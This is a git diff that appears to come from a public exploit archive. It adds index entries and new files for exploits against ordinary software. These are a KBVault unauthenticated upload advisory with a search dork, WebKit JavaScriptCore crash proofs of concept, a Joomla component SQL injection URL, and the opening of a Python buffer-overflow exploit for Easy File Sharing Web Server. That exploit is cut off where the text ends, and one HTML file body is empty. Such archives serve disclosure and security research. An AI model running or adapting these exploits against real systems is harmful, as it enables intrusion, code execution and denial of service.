diff --git a/files.csv b/files.csv index e39c747d4..db729746c 100644 --- a/files.csv +++ b/files.csv @@ -5544,6 +5544,10 @@ id,file,description,date,author,platform,type,port 42170,platforms/android/dos/42170.txt,"LG MRA58K - Missing Bounds-Checking in AVI Stream Parsing",2017-06-13,"Google Security Research",android,dos,0 42171,platforms/android/dos/42171.txt,"LG MRA58K - 'ASFParser::ParseHeaderExtensionObjects' Missing Bounds-Checking",2017-06-13,"Google Security Research",android,dos,0 42182,platforms/windows/dos/42182.cpp,"Avast aswSnx.sys Kernel Driver 11.1.2253 - Memory Corruption Privilege Escalation",2017-06-15,bee13oy,windows,dos,0 +42188,platforms/multiple/dos/42188.html,"WebKit JSC - JSGlobalObject::haveABadTime Causes Type Confusions",2017-06-16,"Google Security Research",multiple,dos,0 +42189,platforms/multiple/dos/42189.html,"WebKit JSC - arrayProtoFuncSplice does not Initialize all Indices",2017-06-16,"Google Security Research",multiple,dos,0 +42190,platforms/multiple/dos/42190.html,"WebKit JSC - JIT Optimization Check Failed in IntegerCheckCombiningPhase::handleBlock",2017-06-16,"Google Security Research",multiple,dos,0 +42191,platforms/multiple/dos/42191.html,"WebKit JSC - Heap Buffer Overflow in Intl.getCanonicalLocales",2017-06-16,"Google Security Research",multiple,dos,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0 @@ -15602,6 +15606,7 @@ id,file,description,date,author,platform,type,port 42165,platforms/windows/remote/42165.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow",2017-06-12,"Touhid M.Shaikh",windows,remote,0 42175,platforms/android/remote/42175.html,"Google Chrome - V8 Private Property Arbitrary Code Execution",2017-06-14,Qihoo360,android,remote,0 42176,platforms/hardware/remote/42176.py,"HP PageWide Printers / HP OfficeJet Pro Printers (OfficeJet Pro 8210) - Arbitrary Code Execution",2017-06-14,"Jacob Baines",hardware,remote,9100 +42186,platforms/windows/remote/42186.py,"Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass)",2017-06-15,"bl4ck h4ck3r",windows,remote,0 14113,platforms/arm/shellcode/14113.txt,"Linux/ARM - setuid(0) & execve(_/bin/sh___/bin/sh__0) Shellcode (38 bytes)",2010-06-29,"Jonathan Salwan",arm,shellcode,0 13241,platforms/aix/shellcode/13241.txt,"AIX - execve /bin/sh Shellcode (88 bytes)",2004-09-26,"Georgi Guninski",aix,shellcode,0 13242,platforms/bsd/shellcode/13242.txt,"BSD - Passive Connection Shellcode (124 bytes)",2000-11-19,Scrippie,bsd,shellcode,0 @@ -38009,3 +38014,5 @@ id,file,description,date,author,platform,type,port 42172,platforms/php/webapps/42172.txt,"WordPress Plugin WP Jobs < 1.5 - SQL Injection",2017-06-11,"Dimitrios Tsagkarakis",php,webapps,0 42173,platforms/php/webapps/42173.txt,"WordPress Plugin Event List <= 0.7.8 - SQL Injection",2017-06-04,"Dimitrios Tsagkarakis",php,webapps,0 42178,platforms/hardware/webapps/42178.py,"Aerohive HiveOS 5.1r5 < 6.1r5 - Remote Code Execution",2017-05-22,Ike-Clinton,hardware,webapps,0 +42184,platforms/aspx/webapps/42184.txt,"KBVault MySQL 0.16a - Arbitrary File Upload",2017-06-14,"Fatih Emiral",aspx,webapps,0 +42185,platforms/php/webapps/42185.txt,"Joomla! Component JoomRecipe 1.0.3 - SQL Injection",2017-06-15,EziBilisim,php,webapps,0 diff --git a/platforms/aspx/webapps/42184.txt b/platforms/aspx/webapps/42184.txt new file mode 100755 index 000000000..bcbef9984 --- /dev/null +++ b/platforms/aspx/webapps/42184.txt @@ -0,0 +1,33 @@ +# Exploit Title: [KBVault MySQL v0.16a - Unauthenticated File Upload to Run Code] +# Google Dork: [inurl:"FileExplorer/Explorer.aspx"] +# Date: [2017-06-14] +# Exploit Author: [Fatih Emiral] +# Vendor Homepage: [http://kbvaultmysql.codeplex.com/] +# Software Link: [http://kbvaultmysql.codeplex.com/downloads/get/858806] +# Version: [0.16a] +# Tested on: [Windows 7 (applicable to all Windows platforms)] +# CVE : [CVE-2017-9602] + +1. Description + +KBVault Mysql Free Knowledge Base application package comes with a third party file management component. An unauthenticated user can access the file upload (and delete) functionality using the following URI: + +http://host/FileExplorer/Explorer.aspx?id=/Uploads + +2. Exploit + +Through this functionality a user can upload an ASPX script to run any arbitrary code, e.g.: + +http://host/Uploads/Documents/cmd.aspx + +3. Solution + +Unauthenticated access to the file management function should be prohibited. +File uploads should be checked against executable formats, and only acceptable file types should be allowed to upload. + +4. Disclosure Timeline + +2017-06-09: Vendor notification +2017-06-09: Vendor responded with intention to fix the vulnerability +2017-06-12: CVE number acquired +2017-06-15: Public disclosure \ No newline at end of file diff --git a/platforms/multiple/dos/42188.html b/platforms/multiple/dos/42188.html new file mode 100755 index 000000000..8094772b7 --- /dev/null +++ b/platforms/multiple/dos/42188.html @@ -0,0 +1,123 @@ + + + +
+ + + \ No newline at end of file diff --git a/platforms/multiple/dos/42189.html b/platforms/multiple/dos/42189.html new file mode 100755 index 000000000..f408f4b69 --- /dev/null +++ b/platforms/multiple/dos/42189.html @@ -0,0 +1,44 @@ + + +function gc() { + for (let i = 0; i < 0x10; i++) + new ArrayBuffer(0x1000000); +} + +Array.prototype.__defineGetter__(0x1000, () => 1); + +gc(); + +for (let i = 0; i < 0x100; i++) { + new Array(0x100).fill(1234.5678); +} + +gc(); + +print(new Array(0x100).splice(0)); \ No newline at end of file diff --git a/platforms/multiple/dos/42190.html b/platforms/multiple/dos/42190.html new file mode 100755 index 000000000..cf6bf6543 --- /dev/null +++ b/platforms/multiple/dos/42190.html @@ -0,0 +1,51 @@ + + +function f() { + let arr = new Uint32Array(10); + for (let i = 0; i < 0x100000; i++) { + parseInt(); + } + arr[8] = 1; + arr[-0x12345678] = 2; +} + +f(); \ No newline at end of file diff --git a/platforms/multiple/dos/42191.html b/platforms/multiple/dos/42191.html new file mode 100755 index 000000000..f6985eeac --- /dev/null +++ b/platforms/multiple/dos/42191.html @@ -0,0 +1,40 @@ + + +Object.prototype.__defineGetter__(1000, () => 2); + +let locales = ['mr', 'bs', 'ee-TG', 'ms', 'kam-KE', 'mt', 'ha', 'es-HN', 'ml-IN', 'ro-MD', 'kab-DZ', 'he', 'es-CO', 'my', 'es-PA', 'az-Latn', 'mer', 'en-NZ', 'xog-UG', 'sg', 'fr-GP', 'sr-Cyrl-BA', 'hi', 'fil-PH', 'lt-LT', 'si', 'en-MT', 'si-LK', 'luo-KE', 'it-CH', 'teo', 'mfe', 'sk', 'uz-Cyrl-UZ', 'sl', 'rm-CH', 'az-Cyrl-AZ', 'fr-GQ', 'kde', 'sn', 'cgg-UG', 'so', 'fr-RW', 'es-SV', 'mas-TZ', 'en-MU', 'sq', 'hr', 'sr', 'en-PH', 'ca', 'hu', 'mk-MK', 'fr-TD', 'nb', 'sv', 'kln-KE', 'sw', 'nd', 'sr-Latn', 'el-GR', 'hy', 'ne', 'el-CY', 'es-CR', 'fo-FO', 'pa-Arab-PK', 'seh', 'ar-YE', 'ja-JP', 'ur-PK', 'pa-Guru', 'gl-ES', 'zh-Hant-HK', 'ar-EG', 'nl', 'th-TH', 'es-PE', 'fr-KM', 'nn', 'kk-Cyrl-KZ', 'kea', 'lv-LV', 'kln', 'tzm-Latn', 'yo', 'gsw-CH', 'ha-Latn-GH', 'is-IS', 'pt-BR', 'cs', 'en-PK', 'fa-IR', 'zh-Hans-SG', 'luo', 'ta', 'fr-TG', 'kde-TZ', 'mr-IN', 'ar-SA', 'ka-GE', 'mfe-MU', 'id', 'fr-LU', 'de-LU', 'ru-MD', 'cy', 'zh-Hans-HK', 'te', 'bg-BG', 'shi-Latn', 'ig', 'ses', 'ii', 'es-BO', 'th', 'ko-KR', 'ti', 'it-IT', 'shi-Latn-MA', 'pt-MZ', 'ff-SN', 'haw', 'zh-Hans', 'so-KE', 'bn-IN', 'en-UM', 'to', 'id-ID', 'uz-Cyrl', 'en-GU', 'es-EC', 'en-US-posix', 'sr-Latn-BA', 'is', 'luy', 'tr', 'en-NA', 'it', 'da', 'bo-IN', 'vun-TZ', 'ar-SD', 'uz-Latn-UZ', 'az-Latn-AZ', 'de', 'es-GQ', 'ta-IN', 'de-DE', 'fr-FR', 'rof-TZ', 'ar-LY', 'en-BW', 'asa', 'zh', 'ha-Latn', 'fr-NE', 'es-MX', 'bem-ZM', 'zh-Hans-CN', 'bn-BD', 'pt-GW', 'om', 'jmc', 'de-AT', 'kk-Cyrl', 'sw-TZ', 'ar-OM', 'et-EE', 'or', 'da-DK', 'ro-RO', 'zh-Hant', 'bm-ML', 'ja', 'fr-CA', 'naq', 'zu', 'en-IE', 'ar-MA', 'es-GT', 'uz-Arab-AF', 'en-AS', 'bs-BA', 'am-ET', 'ar-TN', 'haw-US', 'ar-JO', 'fa-AF', 'uz-Latn', 'en-BZ', 'nyn-UG', 'ebu-KE', 'te-IN', 'cy-GB', 'uk', 'nyn', 'en-JM', 'en-US', 'fil', 'ar-KW', 'af-ZA', 'en-CA', 'fr-DJ', 'ti-ER', 'ig-NG', 'en-AU', 'ur', 'fr-MC', 'pt-PT', 'pa', 'es-419', 'fr-CD', 'en-SG', 'bo-CN', 'kn-IN', 'sr-Cyrl-RS', 'lg-UG', 'gu-IN', 'ee', 'nd-ZW', 'bem', 'uz', 'sw-KE', 'sq-AL', 'hr-HR', 'mas-KE', 'el', 'ti-ET', 'es-AR', 'pl', 'en', 'eo', 'shi', 'kok', 'fr-CF', 'fr-RE', 'mas', 'rof', 'ru-UA', 'yo-NG', 'dav-KE', 'gv-GB', 'pa-Arab', 'es', 'teo-UG', 'ps', 'es-PR', 'fr-MF', 'et', 'pt', 'eu', 'ka', 'rwk-TZ', 'nb-NO', 'fr-CG']; +Intl.getCanonicalLocales(locales); \ No newline at end of file diff --git a/platforms/php/webapps/42185.txt b/platforms/php/webapps/42185.txt new file mode 100755 index 000000000..d0585a174 --- /dev/null +++ b/platforms/php/webapps/42185.txt @@ -0,0 +1,16 @@ +# # # # # +# Exploit Title: Joomla! Component JoomRecipe 1.0.3 - SQL Injection +# Dork: N/A +# Date: 15.06.2017 +# Vendor : http://joomboost.com/ +# Software: https://extensions.joomla.org/extensions/extension/vertical-markets/food-a-beverage/joomrecipe/ +# Demo: http://demo-joomrecipe.joomboost.com/ +# Version: 1.0.3 +# # # # # +# Author: EziBilisim +# Author Web: https://ezibilisim.com/ +# Seo, Web tasarim, Web yazilim, Web guvenlik hizmetleri sunar. +# # # # # +# SQL Injection/Exploit : +# http://localhost/[PATH]/all-recipes/category/[SQL] +# # # # # \ No newline at end of file diff --git a/platforms/windows/remote/42186.py b/platforms/windows/remote/42186.py new file mode 100755 index 000000000..e12f21a5c --- /dev/null +++ b/platforms/windows/remote/42186.py @@ -0,0 +1,168 @@ +#!/usr/bin/python + +# Exploit Title: Easy File Sharing Web Server 7.2 - 'POST' Buffer Overflow (DEP Bypass with ROP) +# Exploit Author: bl4ck h4ck3r +# Software Link: http://www.sharing-file.com/efssetup.exe +# Version: Easy File Sharing Web Server v7.2 +# Tested on: Windows XP SP2, Windows 2008 R2 x64 + +import socket +import struct +import sys + +if len(sys.argv) < 2: + print "\nUsage: " + sys.argv[0] + "